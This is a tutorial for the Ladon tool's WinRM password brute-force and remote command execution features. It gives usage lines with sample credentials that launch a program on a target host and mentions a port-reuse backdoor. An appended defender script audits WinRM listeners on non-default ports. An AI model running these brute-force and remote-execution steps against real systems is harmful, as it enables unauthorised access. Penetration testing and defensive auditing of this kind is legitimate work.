[Tutorial] Ladon WinrmExec: Remote Command Execution
Version
>= Ladon 7.3.0
Update: 20200901
WinrmScan: password brute force on port 5985
Ladon 192.168.1.8 WinrmScan
Ladon 192.168.1.8/24 WinrmScan
WinrmExec: remote command execution
1. No command output is returned
2. Supports SYSTEM privileges
Usage:
Ladon WinrmExec <Target> [Port] [Domain] [Username] [Password] <Command>
Default Port is 5985
Example:
Ladon WinrmExec 192.168.1.116 . k8gege K8test520!@# calc.exe
Ladon WinrmExec 192.168.1.116 80 . k8gege K8test520!@# calc.exe
Ladon WinrmExec 192.168.1.116 5985 . k8gege K8test520!@# calc.exe
WinRM password brute force / port-reuse backdoor
For background, see: http://k8gege.org/Ladon/WinrmScan.html
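A defender-side check for the port point above, added here as an example (it is not part of Ladon or of the original tutorial): WinrmExec defaults to 5985 but the second example targets port 80, so this script parses the text output of `winrm enumerate winrm/config/listener` and reports enabled listeners on ports other than 5985/5986. The sample output, hostname, thumbprint and function names are constructed for illustration.

```python
# 5985 is the default port named on this page; 5986 is the standard WinRM HTTPS port.
DEFAULT_PORTS = {5985, 5986}
# Constructed sample of "winrm enumerate winrm/config/listener" output (not a real host).
SAMPLE = """\
Listener
    Address = *
    Transport = HTTP
    Port = 80
    Hostname
    Enabled = true
    URLPrefix = wsman
    CertificateThumbprint
    ListeningOn = 127.0.0.1, 192.168.1.116

Listener
    Address = *
    Transport = HTTPS
    Port = 5986
    Hostname = host.example.test
    Enabled = true
    URLPrefix = wsman
    CertificateThumbprint = CONSTRUCTED-THUMBPRINT
    ListeningOn = 127.0.0.1, 192.168.1.116
"""

def parse_listeners(text):
    """Split the listing into one dict per 'Listener' block."""
    listeners, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.split()[:1] == ["Listener"]:       # block header, with or without a suffix
            listeners.append(current := {})
        elif current is not None and line:
            key, sep, value = line.partition("=")
            current[key.strip()] = value.strip() if sep else ""  # bare keys carry no value
    return listeners

def audit(text):
    """Return (address, transport, port) for enabled listeners on non-default ports."""
    findings = []
    for lst in parse_listeners(text):
        port = lst.get("Port", "")
        default = port.isdigit() and int(port) in DEFAULT_PORTS
        if lst.get("Enabled", "").lower() == "true" and not default:
            findings.append((lst.get("Address", ""), lst.get("Transport", ""), port))
    return findings

if __name__ == "__main__":
    print(audit(SAMPLE))
```

A listener reported here is a prompt to confirm who configured it and why, since a WinRM endpoint on a web port is easy to overlook in a firewall review.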